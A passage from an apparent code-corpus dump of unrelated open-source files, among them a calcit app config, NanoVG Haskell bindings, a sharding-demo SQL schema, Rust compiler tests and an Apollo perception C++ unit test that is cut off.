:data $ {}
|yT $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |6GejEKuh5Qc)
|j $ {} (:text |reel.core) (:type :leaf) (:at 1553789628765) (:by |root) (:id |AyrtA8Fo4Zl)
|r $ {} (:text |:refer) (:type :leaf) (:at 1553789628765) (:by |root) (:id |GTgkwqQeulH)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |mb76kanWqbu)
|j $ {} (:text |reel-updater) (:type :leaf) (:at 1553789628765) (:by |root) (:id |hfYHYNsakbP)
|r $ {} (:text |refresh-reel) (:type :leaf) (:at 1553789628765) (:by |root) (:id |usfp_oP1gOW)
:type :expr
:at 1553789628765
:by |root
:id |-BeFMelrV1-
:type :expr
:at 1553789628765
:by |root
:id |BbEomqAUHIx
|yj $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |juUr5zGxwOI)
|j $ {} (:text |reel.schema) (:type :leaf) (:at 1553789628765) (:by |root) (:id |HaXFa-l0Xez)
|r $ {} (:text |:as) (:type :leaf) (:at 1553789628765) (:by |root) (:id |kls4liF0pft)
|v $ {} (:text |reel-schema) (:type :leaf) (:at 1553789628765) (:by |root) (:id |IfxnKraczff)
:type :expr
:at 1553789628765
:by |root
:id |JrRPgPvrU3p
|yr $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |-xVPUVgFaqw)
|j $ {} (:text |cljs.reader) (:type :leaf) (:at 1553789628765) (:by |root) (:id |RziJyygWHlH)
|r $ {} (:text |:refer) (:type :leaf) (:at 1553789628765) (:by |root) (:id |fJzBHk3f6ls)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |SYH4IerGu6p)
|j $ {} (:text |read-string) (:type :leaf) (:at 1553789628765) (:by |root) (:id |eBfxVyvoqT5)
:type :expr
:at 1553789628765
:by |root
:id |ZUU2pt8MtWL
:type :expr
:at 1553789628765
:by |root
:id |fnogNBq0y2G
|yv $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |0yL-Pe85ZnQ)
|j $ {} (:text |app.config) (:type :leaf) (:at 1553789628765) (:by |root) (:id |SR_QlZQ2BOI)
|r $ {} (:text |:as) (:type :leaf) (:at 1553789628765) (:by |root) (:id |Yqn7D6FrdMm)
|v $ {} (:text |config) (:type :leaf) (:at 1553789628765) (:by |root) (:id |ijZwxkQZcnJ)
:type :expr
:at 1553789628765
:by |root
:id |jUzqkEeGTNt
|yx $ {}
:data $ {}
|T $ {} (:text "|\"./calcit.build-errors") (:type :leaf) (:at 1629052048281) (:by |Qr5ffqtY)
|j $ {} (:text |:default) (:type :leaf) (:at 1629052048281) (:by |Qr5ffqtY)
|r $ {} (:text |build-errors) (:type :leaf) (:at 1629052048281) (:by |Qr5ffqtY)
:type :expr
:at 1629052048281
:by |Qr5ffqtY
|yy $ {}
:data $ {}
|T $ {} (:text "|\"bottom-tip") (:type :leaf) (:at 1629052048281) (:by |Qr5ffqtY)
|j $ {} (:text |:default) (:type :leaf) (:at 1629052048281) (:by |Qr5ffqtY)
|r $ {} (:text |hud!) (:type :leaf) (:at 1629052048281) (:by |Qr5ffqtY)
:type :expr
:at 1629052048281
:by |Qr5ffqtY
|T $ {} (:text |:require) (:type :leaf) (:at 1553789628765) (:by |root) (:id |Zan__zEXfQ)
|j $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |dWv2Igmz7G)
|j $ {} (:text |respo.core) (:type :leaf) (:at 1553789628765) (:by |root) (:id |HcvhHcqeCL)
|r $ {} (:text |:refer) (:type :leaf) (:at 1553789628765) (:by |root) (:id |0VvtdCFlv3)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |_y3ilDCohA)
|j $ {} (:text |render!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |q2yBeetlCi)
|r $ {} (:text |clear-cache!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |lfJIUn5dTy)
|v $ {} (:text |realize-ssr!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |W2dP1k3wJs)
:type :expr
:at 1553789628765
:by |root
:id |O0hwqMCPcA
:type :expr
:at 1553789628765
:by |root
:id |e156GCIjgN
|r $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |GKxn1ZTA3sj)
|j $ {} (:text |app.comp.container) (:type :leaf) (:at 1553789628765) (:by |root) (:id |u2St6VDiA1E)
|r $ {} (:text |:refer) (:type :leaf) (:at 1553789628765) (:by |root) (:id |gdiuZ6OqdY7)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |yU7RKXUKUqT)
|j $ {} (:text |comp-container) (:type :leaf) (:at 1553789628765) (:by |root) (:id |RfihTKmnS4c)
:type :expr
:at 1553789628765
:by |root
:id |Kdy7xnssAtd
:type :expr
:at 1553789628765
:by |root
:id |rOCVYUnvW6
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |Hphs9JIgO1C)
|j $ {} (:text |app.updater) (:type :leaf) (:at 1553789628765) (:by |root) (:id |iNlNpKsYY-T)
|r $ {} (:text |:refer) (:type :leaf) (:at 1553789628765) (:by |root) (:id |8Me7Hea449s)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |FWJkJZh_lZt)
|j $ {} (:text |updater) (:type :leaf) (:at 1553789628765) (:by |root) (:id |QWb6X_yhRPA)
:type :expr
:at 1553789628765
:by |root
:id |ctsbK0EP5nv
:type :expr
:at 1553789628765
:by |root
:id |kbKw5KRsJ5L
|x $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |WQTOkKm6pdq)
|j $ {} (:text |app.schema) (:type :leaf) (:at 1553789628765) (:by |root) (:id |Pg0dDK6RAs3)
|r $ {} (:text |:as) (:type :leaf) (:at 1553789628765) (:by |root) (:id |dh9v1EAZaOc)
|v $ {} (:text |schema) (:type :leaf) (:at 1553789628765) (:by |root) (:id |C-yIHkLA7yA)
:type :expr
:at 1553789628765
:by |root
:id |cZOSaSOlNVI
|y $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |lPbhDD-rGjv)
|j $ {} (:text |reel.util) (:type :leaf) (:at 1553789628765) (:by |root) (:id |HLoG596-zgo)
|r $ {} (:text |:refer) (:type :leaf) (:at 1553789628765) (:by |root) (:id |8HCemwr6zZ_)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1553789628765) (:by |root) (:id |9ptYlAwvyy-)
|j $ {} (:text |listen-devtools!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |0MW9BHWQ25V)
:type :expr
:at 1553789628765
:by |root
:id |Vos9cVWOiem
:type :expr
:at 1553789628765
:by |root
:id |nHcpd0FqQL4
:type :expr
:at 1553789628765
:by |root
:id |4bmp7p3tWY
:type :expr
:at 1553789628765
:by |root
:id |Uqez8Z6jPu
|app.config $ {}
:defs $ {}
|cdn? $ {}
:data $ {}
|T $ {} (:text |def) (:type :leaf) (:at 1553789417614) (:by |root) (:id |j6bK9YMNET)
|j $ {} (:text |cdn?) (:type :leaf) (:at 1553789417614) (:by |root) (:id |iF0mTs36xP)
|r $ {}
:data $ {}
|T $ {} (:text |cond) (:type :leaf) (:at 1553789417614) (:by |root) (:id |qX4PobRx2t)
|j $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |exists?) (:type :leaf) (:at 1553789417614) (:by |root) (:id |n5Qc3I7I4F)
|j $ {} (:text |js/window) (:type :leaf) (:at 1553789417614) (:by |root) (:id |gSoaiH6SGi)
:type :expr
:at 1553789417614
:by |root
:id |kHhAZNeWp_
|j $ {} (:text |false) (:type :leaf) (:at 1553789417614) (:by |root) (:id |BCGoEjkYie)
:type :expr
:at 1553789417614
:by |root
:id |cj0JSv3Yte
|r $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |exists?) (:type :leaf) (:at 1553789417614) (:by |root) (:id |gR0LoaMD2c)
|j $ {} (:text |js/process) (:type :leaf) (:at 1553789417614) (:by |root) (:id |v6398qjL9H)
:type :expr
:at 1553789417614
:by |root
:id |lCpnozkqFE
|j $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1553789417614) (:by |root) (:id |2XwAx5RcLgt)
|j $ {} (:text "|\"true") (:type :leaf) (:at 1553789417614) (:by |root) (:id |tL-gOcaBiak)
|r $ {} (:text |js/process.env.cdn) (:type :leaf) (:at 1553789417614) (:by |root) (:id |CofNH-fZGGM)
:type :expr
:at 1553789417614
:by |root
:id |31XRUJgJ5Q
:type :expr
:at 1553789417614
:by |root
:id |zzOBxu6NPf
|v $ {}
:data $ {}
|T $ {} (:text |:else) (:type :leaf) (:at 1553789417614) (:by |root) (:id |i4xh9PWSTNn)
|j $ {} (:text |false) (:type :leaf) (:at 1553789417614) (:by |root) (:id |AmXjLc92FyX)
:type :expr
:at 1553789417614
:by |root
:id |Szt0epVd8Nc
:type :expr
:at 1553789417614
:by |root
:id |FIEWMUaqRk
:type :expr
:at 1553789417614
:by |root
:id |tcKDSts_3b
|dev? $ {}
:data $ {}
|T $ {} (:text |def) (:type :leaf) (:at 1553789425694) (:by |root) (:id |w1L1QODhL_)
|j $ {} (:text |dev?) (:type :leaf) (:at 1553789425694) (:by |root) (:id |WYOQjN6fNU)
|r $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1629052090653) (:by |Qr5ffqtY)
|j $ {} (:text "|\"dev") (:type :leaf) (:at 1629052092647) (:by |Qr5ffqtY)
|r $ {}
:data $ {}
|T $ {} (:text |get-env) (:type :leaf) (:at 1629052094381) (:by |Qr5ffqtY)
|j $ {} (:text "|\"mode") (:type :leaf) (:at 1629052095979) (:by |Qr5ffqtY)
:type :expr
:at 1629052093170
:by |Qr5ffqtY
:type :expr
:at 1629052090429
:by |Qr5ffqtY
:type :expr
:at 1553789425694
:by |root
:id |4v06kfp3X9
|site $ {}
:data $ {}
|T $ {} (:text |def) (:type :leaf) (:at 1553789435594) (:by |root) (:id |CPF-ARue0e)
|j $ {} (:text |site) (:type :leaf) (:at 1553789435594) (:by |root) (:id |l22yPT7133)
|r $ {}
:data $ {}
|yT $ {}
:data $ {}
|T $ {} (:text |:icon) (:type :leaf) (:at 1553789435594) (:by |root) (:id |kdeSUDEvBpB)
|j $ {} (:text "|\"http://cdn.tiye.me/logo/pudica.png") (:type :leaf) (:at 1553789552970) (:by |root) (:id |71e97g966dF)
:type :expr
:at 1553789435594
:by |root
:id |T52T_MgmQ_O
|yj $ {}
:data $ {}
|T $ {} (:text |:storage-key) (:type :leaf) (:at 1553789435594) (:by |root) (:id |mHJwV_0__e_)
|j $ {} (:text "|\"pudica-schedule") (:type :leaf) (:at 1553789532035) (:by |root) (:id |y0ZeWxJK6AG)
:type :expr
:at 1553789435594
:by |root
:id |72x0xSbLaza
|yr $ {}
:data $ {}
|T $ {} (:text |:upload-folder) (:type :leaf) (:at 1553789435594) (:by |root) (:id |Hv_soX7x6R1)
|j $ {} (:text "|\"tiye.me:repo/Memkits/pudica-schedule/") (:type :leaf) (:at 1553790439112) (:by |root) (:id |ceUVdzS4jIU)
:type :expr
:at 1553789435594
:by |root
:id |5DbL32D97Ih
|T $ {} (:text |{}) (:type :leaf) (:at 1553789435594) (:by |root) (:id |TeceO13lzb)
|j $ {}
:data $ {}
|T $ {} (:text |:dev-ui) (:type :leaf) (:at 1553789435594) (:by |root) (:id |439IILTQdK)
|j $ {} (:text "|\"http://localhost:8100/main.css") (:type :leaf) (:at 1553789435594) (:by |root) (:id |DG1y0QAYPw)
:type :expr
:at 1553789435594
:by |root
:id |Fkchl_2bBf
|r $ {}
:data $ {}
|T $ {} (:text |:release-ui) (:type :leaf) (:at 1553789435594) (:by |root) (:id |7-DB2ctjql)
|j $ {} (:text "|\"http://cdn.tiye.me/favored-fonts/main.css") (:type :leaf) (:at 1553789435594) (:by |root) (:id |kaMJF2f9MR)
:type :expr
:at 1553789435594
:by |root
:id |IRvoMY-Bqx
|v $ {}
:data $ {}
|T $ {} (:text |:cdn-url) (:type :leaf) (:at 1553789435594) (:by |root) (:id |R5DmxkDYeE)
|j $ {} (:text "|\"http://cdn.tiye.me/pudica-schedule/") (:type :leaf) (:at 1553789541163) (:by |root) (:id |HyvL4-QJie)
:type :expr
:at 1553789435594
:by |root
:id |pt5mK96FjV
|x $ {}
:data $ {}
|T $ {} (:text |:cdn-folder) (:type :leaf) (:at 1553789435594) (:by |root) (:id |KnCemUr8U4i)
|j $ {} (:text "|\"tiye.me:cdn/pudica-schedule") (:type :leaf) (:at 1553789544049) (:by |root) (:id |fq5-dEsRxiH)
:type :expr
:at 1553789435594
:by |root
:id |yQznxJvAYV
|y $ {}
:data $ {}
|T $ {} (:text |:title) (:type :leaf) (:at 1553789435594) (:by |root) (:id |8oZWHXxEWXK)
|j $ {} (:text "|\"Pudica") (:type :leaf) (:at 1553789548498) (:by |root) (:id |mi_hGFnLt0-)
:type :expr
:at 1553789435594
:by |root
:id |TCsP09LtWHA
:type :expr
:at 1553789435594
:by |root
:id |XNT6yiGymu
:type :expr
:at 1553789435594
:by |root
:id |N7mFNfV6Dc
|demo? $ {} (:type :expr) (:by |Qr5ffqtY) (:at 1638686464741)
:data $ {}
|T $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686548312) (:text |def)
|j $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686472088) (:text |demo?)
|r $ {} (:type :expr) (:by |Qr5ffqtY) (:at 1638686464741)
:data $ {}
|T $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686479853) (:text |=)
|j $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686484391) (:text "|\"true")
|r $ {} (:type :expr) (:by |Qr5ffqtY) (:at 1638686485189)
:data $ {}
|T $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686488786) (:text |get-env)
|j $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686491771) (:text "|\"demo")
:proc $ {}
:data $ {}
:type :expr
:at 1528871410284
:by |root
:id |rk7qecV0e7
:ns $ {}
:data $ {}
|T $ {} (:text |ns) (:type :leaf) (:at 1528871410284) (:by |root) (:id |ByWclcVCe7)
|j $ {} (:text |app.config) (:type :leaf) (:at 1528871410284) (:by |root) (:id |Hkzqeq4Cem)
:type :expr
:at 1528871410284
:by |root
:id |S1ecgqE0lX
:configs $ {} (:reload-fn |app.main/reload!) (:port 6001) (:output |src) (:storage-key |calcit.cirru) (:version |0.0.1)
:modules $ [] |respo.calcit/ |lilac/ |memof/ |respo-ui.calcit/ |respo-markdown.calcit/ |reel.calcit/ |bisection-key/
:init-fn |app.main/main!
:extension |.cljs
:entries $ {}
| Cirru | 3 | Memkits/pudica-schedule | calcit.cirru | [
"MIT"
] |
---
layout: layoutLiquid.liquid
keymain: valuemain
title: 'Font Aliasing, or How to Rename a Font in CSS'
permalink: /rename-font/
---
<p>Hello.</p> | Liquid | 0 | binyamin/eleventy | test/stubs/templateWithLayout.liquid | [
"MIT"
] |
module NanoVG.Internal.Color where
import Control.Applicative (pure)
import Foreign.C.Types
import Foreign.Marshal.Alloc
import Foreign.Ptr
import Foreign.Marshal.Utils
import Foreign.Storable
#include "nanovg_wrapper.h"
{#pointer *NVGcolor as ColorPtr -> Color#}
-- | rgba
data Color = Color !CFloat !CFloat !CFloat !CFloat deriving (Show,Read,Eq,Ord)
instance Storable Color where
sizeOf _ = sizeOf (0 :: CFloat) * 4
alignment _ = alignment (0 :: CFloat)
peek p =
do let p' = castPtr p :: Ptr CFloat
r <- peek p'
g <- peekElemOff p' 1
b <- peekElemOff p' 2
a <- peekElemOff p' 3
pure (Color r g b a)
poke p (Color r g b a) =
do let p' = castPtr p :: Ptr CFloat
poke p' r
pokeElemOff p' 1 g
pokeElemOff p' 2 b
pokeElemOff p' 3 a
-- | Returns a color value from red, green, blue values. Alpha will be set to 255 (1.0f).
{#fun pure unsafe nvgRGB_ as rgb
{id`CUChar',id`CUChar',id`CUChar',alloca-`Color'peek*} -> `()'#}
-- | Returns a color value from red, green, blue values. Alpha will be set to 1.0f.
{#fun pure unsafe nvgRGBf_ as rgbf
{`CFloat',`CFloat',`CFloat',alloca-`Color'peek*} -> `()'#}
-- | Returns a color value from red, green, blue and alpha values.
{#fun pure unsafe nvgRGBA_ as rgba
{id`CUChar',id`CUChar',id`CUChar',id`CUChar',alloca-`Color'peek*} -> `()'#}
-- | Returns a color value from red, green, blue and alpha values.
{#fun pure unsafe nvgRGBAf_ as rgbaf
{`CFloat',`CFloat',`CFloat',`CFloat',alloca-`Color'peek*} -> `()'#}
-- | Linearly interpolates from color c0 to c1, and returns resulting color value.
{#fun pure unsafe nvgLerpRGBA_ as lerpRGBA
{with*`Color',with*`Color',`CFloat',alloca-`Color'peek*} -> `()'#}
-- | Sets transparency of a color value.
{#fun pure unsafe nvgTransRGBA_ as transRGBA
{with*`Color',id`CUChar',alloca-`Color'peek*} -> `()'#}
-- | Sets transparency of a color value.
{#fun pure unsafe nvgTransRGBAf_ as transRGBAf
{with*`Color',`CFloat',alloca-`Color'peek*} -> `()'#}
-- | Returns color value specified by hue, saturation and lightness.
-- HSL values are all in range [0..1], alpha will be set to 255.
{#fun pure unsafe nvgHSL_ as hsl
{`CFloat',`CFloat',`CFloat',alloca-`Color'peek*} -> `()'#}
-- | Returns color value specified by hue, saturation and lightness and alpha.
-- HSL values are all in range [0..1], alpha in range [0..255]
{#fun pure unsafe nvgHSLA_ as hsla
{`CFloat',`CFloat',`CFloat',id`CUChar',alloca-`Color'peek*} -> `()'#}
| C2hs Haskell | 5 | fjvallarino/nanovg-hs | src/NanoVG/Internal/Color.chs | [
"0BSD"
] |
<div>
<h2><span>Car</span> {{vm.car.id}}</h2>
<hr>
<jhi-alert-error></jhi-alert-error>
<dl class="dl-horizontal jh-entity-details">
<dt><span>Make</span></dt>
<dd>
<span>{{vm.car.make}}</span>
</dd>
<dt><span>Brand</span></dt>
<dd>
<span>{{vm.car.brand}}</span>
</dd>
<dt><span>Price</span></dt>
<dd>
<span>{{vm.car.price}}</span>
</dd>
</dl>
<button type="submit"
ui-sref="{{ vm.previousState }}"
class="btn btn-info">
<span class="glyphicon glyphicon-arrow-left"></span> <span> Back</span>
</button>
<button type="button" ui-sref="car-detail.edit({id:vm.car.id})" class="btn btn-primary">
<span class="glyphicon glyphicon-pencil"></span>
<span class="hidden-sm-down"> Edit</span>
</button>
</div>
| HTML | 4 | zeesh49/tutorials | jhipster/jhipster-microservice/gateway-app/src/main/webapp/app/entities/car/car-detail.html | [
"MIT"
] |
USE `spring-boot-demo`;
DROP TABLE IF EXISTS `t_order_0`;
CREATE TABLE `t_order_0`
(
`id` BIGINT NOT NULL COMMENT '主键',
`user_id` BIGINT NOT NULL COMMENT '用户id',
`order_id` BIGINT NOT NULL COMMENT '订单id',
`remark` VARCHAR(200) DEFAULT '' COMMENT '备注',
primary key (`id`)
) ENGINE = InnoDB
DEFAULT CHARSET = utf8 COMMENT ='Spring Boot Demo 分库分表 系列示例表0';
DROP TABLE IF EXISTS `t_order_1`;
CREATE TABLE `t_order_1`
(
`id` BIGINT NOT NULL COMMENT '主键',
`user_id` BIGINT NOT NULL COMMENT '用户id',
`order_id` BIGINT NOT NULL COMMENT '订单id',
`remark` VARCHAR(200) DEFAULT '' COMMENT '备注',
primary key (`id`)
) ENGINE = InnoDB
DEFAULT CHARSET = utf8 COMMENT ='Spring Boot Demo 分库分表 系列示例表1';
DROP TABLE IF EXISTS `t_order_2`;
CREATE TABLE `t_order_2`
(
`id` BIGINT NOT NULL COMMENT '主键',
`user_id` BIGINT NOT NULL COMMENT '用户id',
`order_id` BIGINT NOT NULL COMMENT '订单id',
`remark` VARCHAR(200) DEFAULT '' COMMENT '备注',
primary key (`id`)
) ENGINE = InnoDB
DEFAULT CHARSET = utf8 COMMENT ='Spring Boot Demo 分库分表 系列示例表2';
USE `spring-boot-demo-2`;
DROP TABLE IF EXISTS `t_order_0`;
CREATE TABLE `t_order_0`
(
`id` BIGINT NOT NULL COMMENT '主键',
`user_id` BIGINT NOT NULL COMMENT '用户id',
`order_id` BIGINT NOT NULL COMMENT '订单id',
`remark` VARCHAR(200) DEFAULT '' COMMENT '备注',
primary key (`id`)
) ENGINE = InnoDB
DEFAULT CHARSET = utf8 COMMENT ='Spring Boot Demo 分库分表 系列示例表0';
DROP TABLE IF EXISTS `t_order_1`;
CREATE TABLE `t_order_1`
(
`id` BIGINT NOT NULL COMMENT '主键',
`user_id` BIGINT NOT NULL COMMENT '用户id',
`order_id` BIGINT NOT NULL COMMENT '订单id',
`remark` VARCHAR(200) DEFAULT '' COMMENT '备注',
primary key (`id`)
) ENGINE = InnoDB
DEFAULT CHARSET = utf8 COMMENT ='Spring Boot Demo 分库分表 系列示例表1';
DROP TABLE IF EXISTS `t_order_2`;
CREATE TABLE `t_order_2`
(
`id` BIGINT NOT NULL COMMENT '主键',
`user_id` BIGINT NOT NULL COMMENT '用户id',
`order_id` BIGINT NOT NULL COMMENT '订单id',
`remark` VARCHAR(200) DEFAULT '' COMMENT '备注',
primary key (`id`)
) ENGINE = InnoDB
DEFAULT CHARSET = utf8 COMMENT ='Spring Boot Demo 分库分表 系列示例表2'; | SQL | 4 | Evan43789596/spring-boot-demo | spring-boot-demo-sharding-jdbc/sql/schema.sql | [
"MIT"
] |
#! /bin/env pike
/* This file is a syntax highlight test for Kate.
* FIXME: Improve it to contain more (and more unusual) syntax examples.
*/
#define PIKE_ON_THE_WEB /* Is this address correct? */ "http://pike.ida.liu.se/"
int main(int argc, array(string) args)
{
// Write funny things with Pike :)
write(`+("Command line arguments (%d of them): ", @map(args, `+, " ")) + "\n", argc);
write("\nVisit Pike site at %s\n\n", PIKE_ON_THE_WEB);
for (int i = 1; i <= 3; i++)
write(":" + ")" * i + " ");
write("\n" + ({"Bye", "bye"}) * "-" + "!\n");
return 0;
}
| Pike | 4 | dawidsowa/syntax-highlighting | autotests/input/highlight.pike | [
"MIT"
] |
// Copyright 2017 gRPC authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
syntax = "proto3";
import "tests/testing/proto/requests.proto";
package tests_of_grpc_testing;
message Down {
int32 first_down_field = 1;
}
message Strange {
int32 first_strange_field = 1;
}
message Bottom {
int32 first_bottom_field = 1;
}
service FirstService {
rpc UnUn(Up) returns (Down);
rpc UnStre(Charm) returns (stream Strange);
rpc StreUn(stream Charm) returns (Strange);
rpc StreStre(stream Top) returns (stream Bottom);
}
service SecondService {
rpc UnStre(Strange) returns (stream Charm);
}
| Protocol Buffer | 3 | samotarnik/grpc | src/python/grpcio_tests/tests/testing/proto/services.proto | [
"Apache-2.0"
] |
// aux-build:test-macros.rs
#![feature(custom_inner_attributes)]
#[macro_use]
extern crate test_macros;
#[recollect_attr]
fn test1() {
let a: i32 = "foo";
//~^ ERROR: mismatched types
let b: i32 = "f'oo";
//~^ ERROR: mismatched types
}
fn test2() {
#![recollect_attr]
// FIXME: should have a type error here and assert it works but it doesn't
}
trait A {
// FIXME: should have a #[recollect_attr] attribute here and assert that it works
fn foo(&self) {
let a: i32 = "foo";
//~^ ERROR: mismatched types
}
}
struct B;
impl A for B {
#[recollect_attr]
fn foo(&self) {
let a: i32 = "foo";
//~^ ERROR: mismatched types
}
}
#[recollect_attr]
fn main() {
}
| Rust | 4 | Eric-Arellano/rust | src/test/ui/proc-macro/attribute-with-error.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
Package { #name : #'GToolkit-Extensions' }
| Smalltalk | 0 | markfirmware/gtoolkit | src/GToolkit-Extensions/package.st | [
"MIT"
] |
// run-fail
// error-pattern:thread 'main' panicked at 'attempt to multiply with overflow'
// ignore-emscripten no processes
// compile-flags: -C debug-assertions
fn main() {
let _x = 2u32.pow(1024);
}
| Rust | 3 | Eric-Arellano/rust | src/test/ui/numbers-arithmetic/overflowing-pow-unsigned.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
# RUN: llc -O0 -mtriple=arm64eb-- -run-pass=instruction-select -verify-machineinstrs %s -o - | FileCheck %s
---
name: bitcast_v2f32_to_s64
legalized: true
regBankSelected: true
body: |
bb.0:
liveins: $x0
; CHECK-LABEL: name: bitcast_v2f32_to_s64
; CHECK: [[COPY:%[0-9]+]]:fpr64 = COPY $x0
; CHECK: [[REV:%[0-9]+]]:fpr64 = REV64v2i32 [[COPY]]
; CHECK: $x0 = COPY [[REV]]
%0:fpr(<2 x s32>) = COPY $x0
%1:fpr(s64) = G_BITCAST %0
$x0 = COPY %1(s64)
...
| Mirah | 4 | medismailben/llvm-project | llvm/test/CodeGen/AArch64/GlobalISel/select-bitcast-bigendian.mir | [
"Apache-2.0"
] |
/******************************************************************************
* Copyright 2018 The Apollo Authors. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*****************************************************************************/
#include "modules/perception/fusion/lib/data_fusion/shape_fusion/pbf_shape_fusion/pbf_shape_fusion.h"
#include "gtest/gtest.h"
#include "modules/perception/base/sensor_meta.h"
#include "modules/perception/common/perception_gflags.h"
#include "modules/perception/fusion/base/sensor_frame.h"
namespace apollo {
namespace perception {
namespace fusion {
const double SHAPE_FUSION_PI = 3.1415926;
using SensorInfoPtr = std::shared_ptr<perception::base::SensorInfo>;
using FramePtr = std::shared_ptr<perception::base::Frame>;
TEST(PbfShapeFusion, lidar_track) {
FLAGS_work_root =
"/apollo/modules/perception/testdata/fusion/pbf_shape_fusion";
FLAGS_obs_sensor_meta_path = "./data/sensor_meta.pt";
FLAGS_obs_sensor_intrinsic_path =
"/apollo/modules/perception/testdata/fusion/pbf_shape_fusion/params";
Eigen::Matrix4d pose;
pose << 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1;
SensorInfoPtr lidar_sensor_info(new base::SensorInfo);
lidar_sensor_info->type = base::SensorType::VELODYNE_64;
lidar_sensor_info->name = "VELODYNE_64";
SensorPtr lidar_sensor(new Sensor(*lidar_sensor_info));
SensorInfoPtr radar_sensor_info(new base::SensorInfo);
radar_sensor_info->type = base::SensorType::LONG_RANGE_RADAR;
radar_sensor_info->name = "LONG_RANGE_RADAR";
SensorPtr radar_sensor(new Sensor(*radar_sensor_info));
SensorInfoPtr camera_sensor_info(new base::SensorInfo);
camera_sensor_info->type = base::SensorType::MONOCULAR_CAMERA;
camera_sensor_info->name = "MONOCULAR_CAMERA";
SensorPtr camera_sensor(new Sensor(*camera_sensor_info));
// lidar track
base::ObjectPtr base_track_lidar(new base::Object);
base_track_lidar->center = Eigen::Vector3d(10, 0, 0);
base_track_lidar->anchor_point = Eigen::Vector3d(10, 0, 0);
base_track_lidar->theta = static_cast<float>(SHAPE_FUSION_PI / 4.0);
base_track_lidar->direction = Eigen::Vector3f(0.707f, 0.707f, 0.0);
base_track_lidar->size = Eigen::Vector3f(3.0f, 2.0f, 1.0f);
std::vector<base::ObjectPtr> lidar_track_objects;
lidar_track_objects.push_back(base_track_lidar);
FramePtr lidar_track_frame(new base::Frame);
lidar_track_frame->sensor_info = *lidar_sensor_info;
lidar_track_frame->timestamp = 151192277.124567989;
lidar_track_frame->sensor2world_pose = pose;
lidar_track_frame->objects = lidar_track_objects;
SensorFramePtr lidar_sensor_frame(new SensorFrame);
lidar_sensor_frame->Initialize(lidar_track_frame, lidar_sensor);
SensorObjectPtr lidar_obj(
new SensorObject(base_track_lidar, lidar_sensor_frame));
TrackPtr lidar_track(new Track());
lidar_track->Initialize(lidar_obj, false);
// lidar measurment
base::ObjectPtr base_object_lidar(new base::Object);
base_object_lidar->center = Eigen::Vector3d(10, 0, 0);
base_object_lidar->anchor_point = Eigen::Vector3d(10, 0, 0);
base_object_lidar->theta = 0.0;
base_object_lidar->direction = Eigen::Vector3f(1.0f, 0, 0);
base_object_lidar->size = Eigen::Vector3f(5.0f, 2.0f, 1.8f);
std::vector<base::ObjectPtr> lidar_objects;
lidar_objects.push_back(base_object_lidar);
FramePtr lidar_frame(new base::Frame);
lidar_frame->sensor_info = *lidar_sensor_info;
lidar_frame->timestamp = 151192277.124567989;
lidar_frame->sensor2world_pose = pose;
lidar_frame->objects = lidar_objects;
SensorFramePtr lidar_sensor_frame_2(new SensorFrame);
lidar_sensor_frame_2->Initialize(lidar_frame, lidar_sensor);
SensorObjectPtr lidar_measurement(
new SensorObject(base_object_lidar, lidar_sensor_frame_2));
// radar measurment
base::ObjectPtr base_object_radar(new base::Object);
base_object_radar->center = Eigen::Vector3d(10, 0, 0);
